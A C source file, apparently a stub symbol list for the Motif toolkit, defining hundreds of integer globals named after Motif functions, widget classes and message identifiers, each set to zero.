int _XmGMCalcSize = 0;
|
||||
int _XmGMDoLayout = 0;
|
||||
int _XmGMEnforceMargin = 0;
|
||||
int _XmGMHandleGeometryManager = 0;
|
||||
int _XmGMHandleQueryGeometry = 0;
|
||||
int _XmGMOverlap = 0;
|
||||
int _XmGMReplyToQueryGeometry = 0;
|
||||
int _XmGrabKeyboard = 0;
|
||||
int _XmGrabPointer = 0;
|
||||
int xmGrabShellClassRec = 0;
|
||||
int _XmGrabShell_translations = 0;
|
||||
int xmGrabShellWidgetClass = 0;
|
||||
int _XmGrabTheFocus = 0;
|
||||
int _XmHandleGeometryManager = 0;
|
||||
int _XmHandleMenuButtonPress = 0;
|
||||
int _XmHandleQueryGeometry = 0;
|
||||
int _XmHandleSizeUpdate = 0;
|
||||
int _XmHashTableCount = 0;
|
||||
int _XmHashTableSize = 0;
|
||||
int _XmHeapAlloc = 0;
|
||||
int _XmHeapCreate = 0;
|
||||
int _XmHeapFree = 0;
|
||||
int xmHierarchyClassRec = 0;
|
||||
int XmHierarchyGetChildNodes = 0;
|
||||
int XmHierarchyOpenAllAncestors = 0;
|
||||
int xmHierarchyWidgetClass = 0;
|
||||
int _XmHighlightBorder = 0;
|
||||
int _XmHighlightColorDefault = 0;
|
||||
int _XmHighlightPixmapDefault = 0;
|
||||
int _XmHWQuery = 0;
|
||||
int xmI18ListClassRec = 0;
|
||||
int XmI18ListDeselectItems = 0;
|
||||
int XmI18ListDeselectRow = 0;
|
||||
int XmI18ListDoSearch = 0;
|
||||
int XmI18ListFindRow = 0;
|
||||
int XmI18ListGetSelectedRowArray = 0;
|
||||
int XmI18ListGetSelectedRows = 0;
|
||||
int XmI18ListMakeRowVisible = 0;
|
||||
int XmI18ListSelectAllItems = 0;
|
||||
int XmI18ListSelectItems = 0;
|
||||
int XmI18ListSelectRow = 0;
|
||||
int XmI18ListToggleRow = 0;
|
||||
int xmI18ListWidgetClass = 0;
|
||||
int _XmICCCallbackToICCEvent = 0;
|
||||
int _XmICCEventToICCCallback = 0;
|
||||
int xmIconBoxClassRec = 0;
|
||||
int XmIconBoxIsCellEmpty = 0;
|
||||
int xmIconBoxWidgetClass = 0;
|
||||
int xmIconButtonClassRec = 0;
|
||||
int xmIconButtonWidgetClass = 0;
|
||||
int xmIconGadgetClass = 0;
|
||||
int xmIconGadgetClassRec = 0;
|
||||
int _XmIconGadgetIconPos = 0;
|
||||
int xmIconGCacheObjClassRec = 0;
|
||||
int xmIconHeaderClass = 0;
|
||||
int xmIconHeaderClassRec = 0;
|
||||
int _XmIEndUpdate = 0;
|
||||
int _XmImChangeManaged = 0;
|
||||
int XmImCloseXIM = 0;
|
||||
int _XmImFreeShellData = 0;
|
||||
int XmImFreeXIC = 0;
|
||||
int XmImGetXIC = 0;
|
||||
int XmImGetXICResetState = 0;
|
||||
int XmImGetXIM = 0;
|
||||
int XmImMbLookupString = 0;
|
||||
int XmImMbResetIC = 0;
|
||||
int _XmImRealize = 0;
|
||||
int _XmImRedisplay = 0;
|
||||
int XmImRegister = 0;
|
||||
int _XmImResize = 0;
|
||||
int XmImSetFocusValues = 0;
|
||||
int XmImSetValues = 0;
|
||||
int XmImSetXIC = 0;
|
||||
int XmImUnregister = 0;
|
||||
int XmImUnsetFocus = 0;
|
||||
int XmImVaSetFocusValues = 0;
|
||||
int XmImVaSetValues = 0;
|
||||
int _XmIndexToTargets = 0;
|
||||
int _XmInheritClass = 0;
|
||||
int _XmInImageCache = 0;
|
||||
int _XmInitByteOrderChar = 0;
|
||||
int _XmInitializeExtensions = 0;
|
||||
int _XmInitializeMenuCursor = 0;
|
||||
int _XmInitializeScrollBars = 0;
|
||||
int _XmInitializeSyntheticResources = 0;
|
||||
int _XmInitializeTraits = 0;
|
||||
int _XmInitModifiers = 0;
|
||||
int _XmInitTargetsTable = 0;
|
||||
int _XmInputForGadget = 0;
|
||||
int _XmInputInGadget = 0;
|
||||
int _XmInstallImage = 0;
|
||||
int XmInstallImage = 0;
|
||||
int _XmInstallPixmap = 0;
|
||||
int _XmInstallProtocols = 0;
|
||||
int XmInternAtom = 0;
|
||||
int _XmIntersectionOf = 0;
|
||||
int _XmIntersectRect = 0;
|
||||
int _XmInvalidCursorIconQuark = 0;
|
||||
int _XmIsActiveTearOff = 0;
|
||||
int _XmIsEventUnique = 0;
|
||||
int _XmIsFastSubclass = 0;
|
||||
int _XmIsISO10646 = 0;
|
||||
int XmIsMotifWMRunning = 0;
|
||||
int _XmIsNavigable = 0;
|
||||
int _XmIsScrollableClipWidget = 0;
|
||||
int _XmIsSlowSubclass = 0;
|
||||
int _XmIsStandardMotifWidgetClass = 0;
|
||||
int _XmIsSubclassOf = 0;
|
||||
int _XmIsTearOffShellDescendant = 0;
|
||||
int XmIsTraversable = 0;
|
||||
int _XmIsViewable = 0;
|
||||
int _XmJpegErrorExit = 0;
|
||||
int _XmJpegGetImage = 0;
|
||||
int _XmLabel_AccessTextualRecord = 0;
|
||||
int _XmLabelCacheCompare = 0;
|
||||
int _XmLabelCalcTextRect = 0;
|
||||
int xmLabelClassRec = 0;
|
||||
int _XmLabelCloneMenuSavvy = 0;
|
||||
int _XmLabelConvert = 0;
|
||||
int _XmLabel_defaultTranslations = 0;
|
||||
int _XmLabelGadClassExtRec = 0;
|
||||
int xmLabelGadgetClass = 0;
|
||||
int xmLabelGadgetClassRec = 0;
|
||||
int xmLabelGCacheObjClassRec = 0;
|
||||
int _XmLabelGCalcTextRect = 0;
|
||||
int _XmLabelGCloneMenuSavvy = 0;
|
||||
int _XmLabelGCVTRedraw = 0;
|
||||
int _XmLabel_menuTranslations = 0;
|
||||
int _XmLabel_menu_traversal_events = 0;
|
||||
int _XmLabelPrimClassExtRec = 0;
|
||||
int _XmLabelSetBackgroundGC = 0;
|
||||
int xmLabelWidgetClass = 0;
|
||||
int _XmLeafPaneFocusOut = 0;
|
||||
int _XmLeaveGadget = 0;
|
||||
int _XmLinkCursorIconQuark = 0;
|
||||
int _XmListAddAfter = 0;
|
||||
int _XmListAddBefore = 0;
|
||||
int XmListAddItem = 0;
|
||||
int XmListAddItems = 0;
|
||||
int XmListAddItemsUnselected = 0;
|
||||
int XmListAddItemUnselected = 0;
|
||||
int xmListClassRec = 0;
|
||||
int _XmListCount = 0;
|
||||
int XmListDeleteAllItems = 0;
|
||||
int XmListDeleteItem = 0;
|
||||
int XmListDeleteItems = 0;
|
||||
int XmListDeleteItemsPos = 0;
|
||||
int XmListDeletePos = 0;
|
||||
int XmListDeletePositions = 0;
|
||||
int XmListDeselectAllItems = 0;
|
||||
int XmListDeselectItem = 0;
|
||||
int XmListDeselectPos = 0;
|
||||
int _XmListExec = 0;
|
||||
int _XmListFree = 0;
|
||||
int XmListGetKbdItemPos = 0;
|
||||
int XmListGetMatchPos = 0;
|
||||
int XmListGetSelectedPos = 0;
|
||||
int _XmListInit = 0;
|
||||
int XmListItemExists = 0;
|
||||
int XmListItemPos = 0;
|
||||
int _XmList_ListXlations1 = 0;
|
||||
int _XmList_ListXlations2 = 0;
|
||||
int XmListPosSelected = 0;
|
||||
int XmListPosToBounds = 0;
|
||||
int _XmListRemove = 0;
|
||||
int XmListReplaceItems = 0;
|
||||
int XmListReplaceItemsPos = 0;
|
||||
int XmListReplaceItemsPosUnselected = 0;
|
||||
int XmListReplaceItemsUnselected = 0;
|
||||
int XmListReplacePositions = 0;
|
||||
int XmListSelectItem = 0;
|
||||
int XmListSelectPos = 0;
|
||||
int XmListSetAddMode = 0;
|
||||
int XmListSetBottomItem = 0;
|
||||
int XmListSetBottomPos = 0;
|
||||
int XmListSetHorizPos = 0;
|
||||
int XmListSetItem = 0;
|
||||
int XmListSetKbdItemPos = 0;
|
||||
int XmListSetPos = 0;
|
||||
int XmListUpdateSelectedList = 0;
|
||||
int xmListWidgetClass = 0;
|
||||
int XmListYToPos = 0;
|
||||
int _XmLowerCase = 0;
|
||||
int _XmLowerTearOffObscuringPoppingDownPanes = 0;
|
||||
int xmMainWindowClassRec = 0;
|
||||
int XmMainWindowSep1 = 0;
|
||||
int XmMainWindowSep2 = 0;
|
||||
int XmMainWindowSep3 = 0;
|
||||
int XmMainWindowSetAreas = 0;
|
||||
int xmMainWindowWidgetClass = 0;
|
||||
int _XmMakeGeometryRequest = 0;
|
||||
int xmManagerClassRec = 0;
|
||||
int _XmManager_defaultTranslations = 0;
|
||||
int _XmManagerEnter = 0;
|
||||
int _XmManagerFocusIn = 0;
|
||||
int _XmManagerFocusInInternal = 0;
|
||||
int _XmManagerFocusOut = 0;
|
||||
int _XmManagerGetValuesHook = 0;
|
||||
int _XmManagerHelp = 0;
|
||||
int _XmManagerHighlightPixmapDefault = 0;
|
||||
int _XmManagerImportArgs = 0;
|
||||
int _XmManagerLeave = 0;
|
||||
int _XmManager_managerTraversalTranslations = 0;
|
||||
int _XmManagerParentActivate = 0;
|
||||
int _XmManagerParentCancel = 0;
|
||||
int _XmManagerTopShadowPixmapDefault = 0;
|
||||
int _XmManagerUnmap = 0;
|
||||
int xmManagerWidgetClass = 0;
|
||||
int _XmMapBtnEvent = 0;
|
||||
int _XmMapHashTable = 0;
|
||||
int _XmMapKeyEvent = 0;
|
||||
int _XmMapKeyEvents = 0;
|
||||
int XmMapSegmentEncoding = 0;
|
||||
int _XmMatchBDragEvent = 0;
|
||||
int _XmMatchBSelectEvent = 0;
|
||||
int _XmMatchBtnEvent = 0;
|
||||
int _XmMatchKeyEvent = 0;
|
||||
int _XmMenuBarFix = 0;
|
||||
int _XmMenuBarGadgetSelect = 0;
|
||||
int _XmMenuBtnDown = 0;
|
||||
int _XmMenuBtnUp = 0;
|
||||
int _XmMenuButtonTakeFocus = 0;
|
||||
int _XmMenuButtonTakeFocusUp = 0;
|
||||
int _XmMenuCursorContext = 0;
|
||||
int _XmMenuEscape = 0;
|
||||
int _XmMenuFocus = 0;
|
||||
int _XmMenuFocusIn = 0;
|
||||
int _XmMenuFocusOut = 0;
|
||||
int _XmMenuGadgetDrag = 0;
|
||||
int _XmMenuGadgetTraverseCurrent = 0;
|
||||
int _XmMenuGadgetTraverseCurrentUp = 0;
|
||||
int _XmMenuGrabKeyboardAndPointer = 0;
|
||||
int _XmMenuHelp = 0;
|
||||
int _XmMenuPopDown = 0;
|
||||
int XmMenuPosition = 0;
|
||||
int _XmMenuSetInPMMode = 0;
|
||||
int xmMenuShellClassRec = 0;
|
||||
int _XmMenuShell_translations = 0;
|
||||
int xmMenuShellWidgetClass = 0;
|
||||
int _XmMenuTraversalHandler = 0;
|
||||
int _XmMenuTraverseDown = 0;
|
||||
int _XmMenuTraverseLeft = 0;
|
||||
int _XmMenuTraverseRight = 0;
|
||||
int _XmMenuTraverseUp = 0;
|
||||
int _XmMenuUnmap = 0;
|
||||
int xmMessageBoxClassRec = 0;
|
||||
int _XmMessageBoxGeoMatrixCreate = 0;
|
||||
int XmMessageBoxGetChild = 0;
|
||||
int _XmMessageBoxNoGeoRequest = 0;
|
||||
int xmMessageBoxWidgetClass = 0;
|
||||
int _XmMessageTypeToReason = 0;
|
||||
int _XmMgrTraversal = 0;
|
||||
int _XmMicroSleep = 0;
|
||||
int _Xm_MOTIF_DRAG_AND_DROP_MESSAGE = 0;
|
||||
int _XmMoveCursorIconQuark = 0;
|
||||
int _XmMoveObject = 0;
|
||||
int _XmMoveWidget = 0;
|
||||
int _XmMsgBaseClass_0000 = 0;
|
||||
int _XmMsgBaseClass_0001 = 0;
|
||||
int _XmMsgBulletinB_0001 = 0;
|
||||
int _XmMsgCascadeB_0000 = 0;
|
||||
int _XmMsgCascadeB_0001 = 0;
|
||||
int _XmMsgCascadeB_0002 = 0;
|
||||
int _XmMsgCascadeB_0003 = 0;
|
||||
int _XmMsgColObj_0001 = 0;
|
||||
int _XmMsgColObj_0002 = 0;
|
||||
int _XmMsgComboBox_0000 = 0;
|
||||
int _XmMsgComboBox_0001 = 0;
|
||||
int _XmMsgComboBox_0004 = 0;
|
||||
int _XmMsgComboBox_0005 = 0;
|
||||
int _XmMsgComboBox_0006 = 0;
|
||||
int _XmMsgComboBox_0007 = 0;
|
||||
int _XmMsgComboBox_0008 = 0;
|
||||
int _XmMsgComboBox_0009 = 0;
|
||||
int _XmMsgComboBox_0010 = 0;
|
||||
int _XmMsgComboBox_0011 = 0;
|
||||
int _XmMsgComboBox_0012 = 0;
|
||||
int _XmMsgComboBox_0013 = 0;
|
||||
int _XmMsgComboBox_0014 = 0;
|
||||
int _XmMsgCommand_0000 = 0;
|
||||
int _XmMsgCommand_0001 = 0;
|
||||
int _XmMsgCommand_0002 = 0;
|
||||
int _XmMsgCommand_0003 = 0;
|
||||
int _XmMsgCommand_0004 = 0;
|
||||
int _XmMsgCommand_0005 = 0;
|
||||
int _XmMsgContainer_0000 = 0;
|
||||
int _XmMsgContainer_0001 = 0;
|
||||
int _XmMsgCutPaste_0000 = 0;
|
||||
int _XmMsgCutPaste_0001 = 0;
|
||||
int _XmMsgCutPaste_0002 = 0;
|
||||
int _XmMsgCutPaste_0003 = 0;
|
||||
int _XmMsgCutPaste_0004 = 0;
|
||||
int _XmMsgCutPaste_0005 = 0;
|
||||
int _XmMsgCutPaste_0006 = 0;
|
||||
int _XmMsgCutPaste_0007 = 0;
|
||||
int _XmMsgCutPaste_0008 = 0;
|
||||
int _XmMsgCutPaste_0009 = 0;
|
||||
int _XmMsgDataF_0000 = 0;
|
||||
int _XmMsgDataF_0001 = 0;
|
||||
int _XmMsgDataF_0002 = 0;
|
||||
int _XmMsgDataF_0003 = 0;
|
||||
int _XmMsgDataF_0004 = 0;
|
||||
int _XmMsgDataF_0005 = 0;
|
||||
int _XmMsgDataF_0006 = 0;
|
||||
int _XmMsgDataFWcs_0000 = 0;
|
||||
int _XmMsgDataFWcs_0001 = 0;
|
||||
int _XmMsgDialogS_0000 = 0;
|
||||
int _XmMsgDisplay_0001 = 0;
|
||||
int _XmMsgDisplay_0002 = 0;
|
||||
int _XmMsgDisplay_0003 = 0;
|
||||
int _XmMsgDragBS_0000 = 0;
|
||||
int _XmMsgDragBS_0001 = 0;
|
||||
int _XmMsgDragBS_0002 = 0;
|
||||
int _XmMsgDragBS_0003 = 0;
|
||||
int _XmMsgDragBS_0004 = 0;
|
||||
int _XmMsgDragBS_0005 = 0;
|
||||
int _XmMsgDragBS_0006 = 0;
|
||||
int _XmMsgDragC_0001 = 0;
|
||||
int _XmMsgDragC_0002 = 0;
|
||||
int _XmMsgDragC_0003 = 0;
|
||||
int _XmMsgDragC_0004 = 0;
|
||||
int _XmMsgDragC_0005 = 0;
|
||||
int _XmMsgDragC_0006 = 0;
|
||||
int _XmMsgDragICC_0000 = 0;
|
||||
int _XmMsgDragICC_0001 = 0;
|
||||
int _XmMsgDragIcon_0000 = 0;
|
||||
int _XmMsgDragIcon_0001 = 0;
|
||||
int _XmMsgDragOverS_0000 = 0;
|
||||
int _XmMsgDragOverS_0001 = 0;
|
||||
int _XmMsgDragOverS_0002 = 0;
|
||||
int _XmMsgDragOverS_0003 = 0;
|
||||
int _XmMsgDragUnder_0000 = 0;
|
||||
int _XmMsgDragUnder_0001 = 0;
|
||||
int _XmMsgDropSMgr_0001 = 0;
|
||||
int _XmMsgDropSMgr_0002 = 0;
|
||||
int _XmMsgDropSMgr_0003 = 0;
|
||||
int _XmMsgDropSMgr_0004 = 0;
|
||||
int _XmMsgDropSMgr_0005 = 0;
|
||||
int _XmMsgDropSMgr_0006 = 0;
|
||||
int _XmMsgDropSMgr_0007 = 0;
|
||||
int _XmMsgDropSMgr_0008 = 0;
|
||||
int _XmMsgDropSMgr_0009 = 0;
|
||||
int _XmMsgDropSMgr_0010 = 0;
|
||||
int _XmMsgDropSMgrI_0001 = 0;
|
||||
int _XmMsgDropSMgrI_0002 = 0;
|
||||
int _XmMsgDropSMgrI_0003 = 0;
|
||||
int _XmMsgForm_0000 = 0;
|
||||
int _XmMsgForm_0002 = 0;
|
||||
int _XmMsgForm_0003 = 0;
|
||||
int _XmMsgGadget_0000 = 0;
|
||||
int _XmMsgLabel_0003 = 0;
|
||||
int _XmMsgLabel_0004 = 0;
|
||||
int _XmMsgList_0000 = 0;
|
||||
int _XmMsgList_0005 = 0;
|
||||
int _XmMsgList_0006 = 0;
|
||||
int _XmMsgList_0007 = 0;
|
||||
int _XmMsgList_0008 = 0;
|
||||
int _XmMsgList_0009 = 0;
|
||||
int _XmMsgList_0010 = 0;
|
||||
int _XmMsgList_0011 = 0;
|
||||
int _XmMsgList_0012 = 0;
|
||||
int _XmMsgList_0013 = 0;
|
||||
int _XmMsgList_0014 = 0;
|
||||
int _XmMsgList_0015 = 0;
|
||||
int _XmMsgMainW_0000 = 0;
|
||||
int _XmMsgMainW_0001 = 0;
|
||||
int _XmMsgManager_0000 = 0;
|
||||
int _XmMsgManager_0001 = 0;
|
||||
int _XmMsgMenuShell_0000 = 0;
|
||||
int _XmMsgMenuShell_0001 = 0;
|
||||
int _XmMsgMenuShell_0002 = 0;
|
||||
int _XmMsgMenuShell_0003 = 0;
|
||||
int _XmMsgMenuShell_0004 = 0;
|
||||
int _XmMsgMenuShell_0005 = 0;
|
||||
int _XmMsgMenuShell_0006 = 0;
|
||||
int _XmMsgMenuShell_0007 = 0;
|
||||
int _XmMsgMenuShell_0008 = 0;
|
||||
int _XmMsgMenuShell_0009 = 0;
|
||||
int _XmMsgMessageB_0003 = 0;
|
||||
int _XmMsgMessageB_0004 = 0;
|
||||
int _XmMsgMotif_0000 = 0;
|
||||
int _XmMsgMotif_0001 = 0;
|
||||
int _XmMsgNotebook_0000 = 0;
|
||||
int _XmMsgPanedW_0000 = 0;
|
||||
int _XmMsgPanedW_0001 = 0;
|
||||
int _XmMsgPanedW_0002 = 0;
|
||||
int _XmMsgPanedW_0004 = 0;
|
||||
int _XmMsgPanedW_0005 = 0;
|
||||
int _XmMsgPixConv_0000 = 0;
|
||||
int _XmMsgPrimitive_0000 = 0;
|
||||
int _XmMsgProtocols_0000 = 0;
|
||||
int _XmMsgProtocols_0001 = 0;
|
||||
int _XmMsgProtocols_0002 = 0;
|
||||
int _XmMsgRegion_0000 = 0;
|
||||
int _XmMsgRepType_0000 = 0;
|
||||
int _XmMsgRepType_0001 = 0;
|
||||
int _XmMsgRepType_0002 = 0;
|
||||
int _XmMsgResConvert_0001 = 0;
|
||||
int _XmMsgResConvert_0002 = 0;
|
||||
int _XmMsgResConvert_0003 = 0;
|
||||
int _XmMsgResConvert_0005 = 0;
|
||||
int _XmMsgResConvert_0006 = 0;
|
||||
int _XmMsgResConvert_0007 = 0;
|
||||
int _XmMsgResConvert_0008 = 0;
|
||||
int _XmMsgResConvert_0009 = 0;
|
||||
int _XmMsgResConvert_0010 = 0;
|
||||
int _XmMsgResConvert_0011 = 0;
|
||||
int _XmMsgResConvert_0012 = 0;
|
||||
int _XmMsgResConvert_0013 = 0;
|
||||
int _XmMsgResource_0001 = 0;
|
||||
int _XmMsgResource_0002 = 0;
|
||||
int _XmMsgResource_0003 = 0;
|
||||
int _XmMsgResource_0004 = 0;
|
||||
int _XmMsgResource_0005 = 0;
|
||||
int _XmMsgResource_0006 = 0;
|
||||
int _XmMsgResource_0007 = 0;
|
||||
int _XmMsgResource_0008 = 0;
|
||||
int _XmMsgResource_0009 = 0;
|
||||
int _XmMsgResource_0010 = 0;
|
||||
int _XmMsgResource_0011 = 0;
|
||||
int _XmMsgResource_0012 = 0;
|
||||
int _XmMsgResource_0013 = 0;
|
||||
int _XmMsgRowColText_0024 = 0;
|
||||
int _XmMsgRowColumn_0000 = 0;
|
||||
int _XmMsgRowColumn_0001 = 0;
|
||||
int _XmMsgRowColumn_0002 = 0;
|
||||
int _XmMsgRowColumn_0003 = 0;
|
||||
int _XmMsgRowColumn_0004 = 0;
|
||||
int _XmMsgRowColumn_0005 = 0;
|
||||
int _XmMsgRowColumn_0007 = 0;
|
||||
int _XmMsgRowColumn_0008 = 0;
|
||||
int _XmMsgRowColumn_0015 = 0;
|
||||
int _XmMsgRowColumn_0016 = 0;
|
||||
int _XmMsgRowColumn_0017 = 0;
|
||||
int _XmMsgRowColumn_0018 = 0;
|
||||
int _XmMsgRowColumn_0019 = 0;
|
||||
int _XmMsgRowColumn_0020 = 0;
|
||||
int _XmMsgRowColumn_0022 = 0;
|
||||
int _XmMsgRowColumn_0023 = 0;
|
||||
int _XmMsgRowColumn_0025 = 0;
|
||||
int _XmMsgRowColumn_0026 = 0;
|
||||
int _XmMsgRowColumn_0027 = 0;
|
||||
int _XmMsgScale_0000 = 0;
|
||||
int _XmMsgScale_0001 = 0;
|
||||
int _XmMsgScale_0002 = 0;
|
||||
int _XmMsgScale_0006 = 0;
|
||||
int _XmMsgScale_0007 = 0;
|
||||
int _XmMsgScale_0008 = 0;
|
||||
int _XmMsgScale_0009 = 0;
|
||||
int _XmMsgScaleScrBar_0004 = 0;
|
||||
int _XmMsgScreen_0000 = 0;
|
||||
int _XmMsgScreen_0001 = 0;
|
||||
int _XmMsgScrollBar_0000 = 0;
|
||||
int _XmMsgScrollBar_0001 = 0;
|
||||
int _XmMsgScrollBar_0002 = 0;
|
||||
int _XmMsgScrollBar_0003 = 0;
|
||||
int _XmMsgScrollBar_0004 = 0;
|
||||
int _XmMsgScrollBar_0005 = 0;
|
||||
int _XmMsgScrollBar_0006 = 0;
|
||||
int _XmMsgScrollBar_0007 = 0;
|
||||
int _XmMsgScrollBar_0008 = 0;
|
||||
int _XmMsgScrolledW_0004 = 0;
|
||||
int _XmMsgScrolledW_0005 = 0;
|
||||
int _XmMsgScrolledW_0006 = 0;
|
||||
int _XmMsgScrolledW_0007 = 0;
|
||||
int _XmMsgScrolledW_0008 = 0;
|
||||
int _XmMsgScrolledW_0009 = 0;
|
||||
int _XmMsgScrollFrameT_0000 = 0;
|
||||
int _XmMsgScrollFrameT_0001 = 0;
|
||||
int _XmMsgScrollVis_0000 = 0;
|
||||
int _XmMsgSelectioB_0001 = 0;
|
||||
int _XmMsgSelectioB_0002 = 0;
|
||||
int _XmMsgSpinB_0003 = 0;
|
||||
int _XmMsgSpinB_0004 = 0;
|
||||
int _XmMsgSpinB_0005 = 0;
|
||||
int _XmMsgSpinB_0006 = 0;
|
||||
int _XmMsgSpinB_0007 = 0;
|
||||
int _XmMsgSpinB_0008 = 0;
|
||||
int _XmMsgSSpinB_0001 = 0;
|
||||
int _XmMsgSSpinB_0002 = 0;
|
||||
int _XmMsgSSpinB_0003 = 0;
|
||||
int _XmMsgText_0000 = 0;
|
||||
int _XmMsgTextF_0000 = 0;
|
||||
int _XmMsgTextF_0001 = 0;
|
||||
int _XmMsgTextF_0002 = 0;
|
||||
int _XmMsgTextF_0003 = 0;
|
||||
int _XmMsgTextF_0004 = 0;
|
||||
int _XmMsgTextF_0006 = 0;
|
||||
int _XmMsgTextFWcs_0000 = 0;
|
||||
int _XmMsgTextIn_0000 = 0;
|
||||
int _XmMsgTextOut_0000 = 0;
|
||||
int _XmMsgTransfer_0000 = 0;
|
||||
int _XmMsgTransfer_0002 = 0;
|
||||
int _XmMsgTransfer_0003 = 0;
|
||||
int _XmMsgTransfer_0004 = 0;
|
||||
int _XmMsgTransfer_0005 = 0;
|
||||
int _XmMsgTransfer_0006 = 0;
|
||||
int _XmMsgTransfer_0007 = 0;
|
||||
int _XmMsgVaSimple_0000 = 0;
|
||||
int _XmMsgVaSimple_0001 = 0;
|
||||
int _XmMsgVaSimple_0002 = 0;
|
||||
int _XmMsgVendor_0000 = 0;
|
||||
int _XmMsgVendor_0001 = 0;
|
||||
int _XmMsgVendor_0002 = 0;
|
||||
int _XmMsgVendor_0003 = 0;
|
||||
int _XmMsgVisual_0000 = 0;
|
||||
int _XmMsgVisual_0001 = 0;
|
||||
int _XmMsgVisual_0002 = 0;
|
||||
int _XmMsgXmIm_0000 = 0;
|
||||
int _XmMsgXmRenderT_0000 = 0;
|
||||
int _XmMsgXmRenderT_0001 = 0;
|
||||
int _XmMsgXmRenderT_0002 = 0;
|
||||
int _XmMsgXmRenderT_0003 = 0;
|
||||
int _XmMsgXmRenderT_0004 = 0;
|
||||
int _XmMsgXmRenderT_0005 = 0;
|
||||
int _XmMsgXmString_0000 = 0;
|
||||
int _XmMsgXmTabList_0000 = 0;
|
||||
int xmMultiListClassRec = 0;
|
||||
int XmMultiListDeselectItems = 0;
|
||||
int XmMultiListDeselectRow = 0;
|
||||
int XmMultiListGetSelectedRowArray = 0;
|
||||
int XmMultiListGetSelectedRows = 0;
|
||||
int XmMultiListMakeRowVisible = 0;
|
||||
int XmMultiListSelectAllItems = 0;
|
||||
int XmMultiListSelectItems = 0;
|
||||
int XmMultiListSelectRow = 0;
|
||||
int XmMultiListToggleRow = 0;
|
||||
int XmMultiListUnselectAllItems = 0;
|
||||
int XmMultiListUnselectItem = 0;
|
||||
int xmMultiListWidgetClass = 0;
|
||||
int _XmNavigate = 0;
|
||||
int _XmNavigChangeManaged = 0;
|
||||
int _XmNavigDestroy = 0;
|
||||
int _XmNavigInitialize = 0;
|
||||
int _XmNavigResize = 0;
|
||||
int _XmNavigSetValues = 0;
|
||||
int _XmNewTravGraph = 0;
|
||||
int _XmNoneCursorIconQuark = 0;
|
||||
int xmNotebookClassRec = 0;
|
||||
int XmNotebookGetPageInfo = 0;
|
||||
int _XmNotebook_manager_translations = 0;
|
||||
int _XmNotebook_TabAccelerators = 0;
|
||||
int xmNotebookWidgetClass = 0;
|
||||
int _XmNotifyChildrenVisual = 0;
|
||||
int _XmNumDSResources = 0;
|
||||
int XmObjectAtPoint = 0;
|
||||
int _XmOffsetArrow = 0;
|
||||
int XmOptionButtonGadget = 0;
|
||||
int XmOptionLabelGadget = 0;
|
||||
int _XmOSAbsolutePathName = 0;
|
||||
int _XmOSBuildFileList = 0;
|
||||
int _XmOSBuildFileName = 0;
|
||||
int _XmOSFileCompare = 0;
|
||||
int _XmOSFindPathParts = 0;
|
||||
int _XmOSFindPatternPart = 0;
|
||||
int _XmOSGenerateMaskName = 0;
|
||||
int _XmOSGetCharDirection = 0;
|
||||
int _XmOSGetDirEntries = 0;
|
||||
int _XmOSGetHomeDirName = 0;
|
||||
int _XmOSGetInitialCharsDirection = 0;
|
||||
int _XmOSGetLocalizedString = 0;
|
||||
int XmOSGetMethod = 0;
|
||||
int _XmOSInitPath = 0;
|
||||
int _XmOSKeySymToCharacter = 0;
|
||||
int _XmOSPutenv = 0;
|
||||
int _XmOSQualifyFileSpec = 0;
|
||||
int xmOutlineClassRec = 0;
|
||||
int xmOutlineWidgetClass = 0;
|
||||
int XMoveResizeWindow = 0;
|
||||
int XMoveWindow = 0;
|
||||
int xmPanedClassRec = 0;
|
||||
int XmPanedGetPanes = 0;
|
||||
int xmPanedWidgetClass = 0;
|
||||
int xmPanedWindowClassRec = 0;
|
||||
int xmPanedWindowWidgetClass = 0;
|
||||
int _XmParentProcess = 0;
|
||||
int XmParseMappingCreate = 0;
|
||||
int XmParseMappingFree = 0;
|
||||
int XmParseMappingGetValues = 0;
|
||||
int XmParseMappingSetValues = 0;
|
||||
int XmParsePicture = 0;
|
||||
int XmParseTableFree = 0;
|
||||
int _XmPathIsTraversable = 0;
|
||||
int XmPictureDelete = 0;
|
||||
int XmPictureDeleteState = 0;
|
||||
int XmPictureDoAutoFill = 0;
|
||||
int XmPictureGetCurrentString = 0;
|
||||
int XmPictureProcessCharacter = 0;
|
||||
int _XmPngGetImage = 0;
|
||||
int _XmPopdown = 0;
|
||||
int _XmPopup = 0;
|
||||
int _XmPopupSpringLoaded = 0;
|
||||
int _XmPopWidgetExtData = 0;
|
||||
int _XmPostPopupMenu = 0;
|
||||
int _XmPrimbaseClassExtRec = 0;
|
||||
int _XmPrimClassExtRec = 0;
|
||||
int xmPrimitiveClassRec = 0;
|
||||
int _XmPrimitive_defaultTranslations = 0;
|
||||
int _XmPrimitiveEnter = 0;
|
||||
int _XmPrimitiveFocusIn = 0;
|
||||
int _XmPrimitiveFocusInInternal = 0;
|
||||
int _XmPrimitiveFocusOut = 0;
|
||||
int _XmPrimitiveGetValuesHook = 0;
|
||||
int _XmPrimitiveHelp = 0;
|
||||
int _XmPrimitiveHighlightPixmapDefault = 0;
|
||||
int _XmPrimitiveImportArgs = 0;
|
||||
int _XmPrimitiveLeave = 0;
|
||||
int _XmPrimitiveParentActivate = 0;
|
||||
int _XmPrimitiveParentCancel = 0;
|
||||
int _XmPrimitiveTopShadowPixmapDefault = 0;
|
||||
int _XmPrimitiveUnmap = 0;
|
||||
int xmPrimitiveWidgetClass = 0;
|
||||
int _XmProcessDrag = 0;
|
||||
int _XmProcessTraversal = 0;
|
||||
int XmProcessTraversal = 0;
|
||||
int xmProtocolClassRec = 0;
|
||||
int xmProtocolObjectClass = 0;
|
||||
int _XmPushB_defaultTranslations = 0;
|
||||
int _XmPushBGadClassExtRec = 0;
|
||||
int _XmPushB_menuTranslations = 0;
|
||||
int _XmPushBPrimClassExtRec = 0;
|
||||
int xmPushButtonClassRec = 0;
|
||||
int xmPushButtonGadgetClass = 0;
|
||||
int xmPushButtonGadgetClassRec = 0;
|
||||
int xmPushButtonGCacheObjClassRec = 0;
|
||||
int xmPushButtonWidgetClass = 0;
|
||||
int _XmPushWidgetExtData = 0;
|
||||
int _XmPutScaledImage = 0;
|
||||
int XmQmotif = 0;
|
||||
int XmQTaccessColors = 0;
|
||||
int XmQTaccessTextual = 0;
|
||||
int XmQTactivatable = 0;
|
||||
int XmQTcareParentVisual = 0;
|
||||
int _XmQTclipWindow = 0;
|
||||
int XmQTcontainer = 0;
|
||||
int XmQTcontainerItem = 0;
|
||||
int XmQTdialogShellSavvy = 0;
|
||||
int XmQTjoinSide = 0;
|
||||
int XmQTmenuSavvy = 0;
|
||||
int XmQTmenuSystem = 0;
|
||||
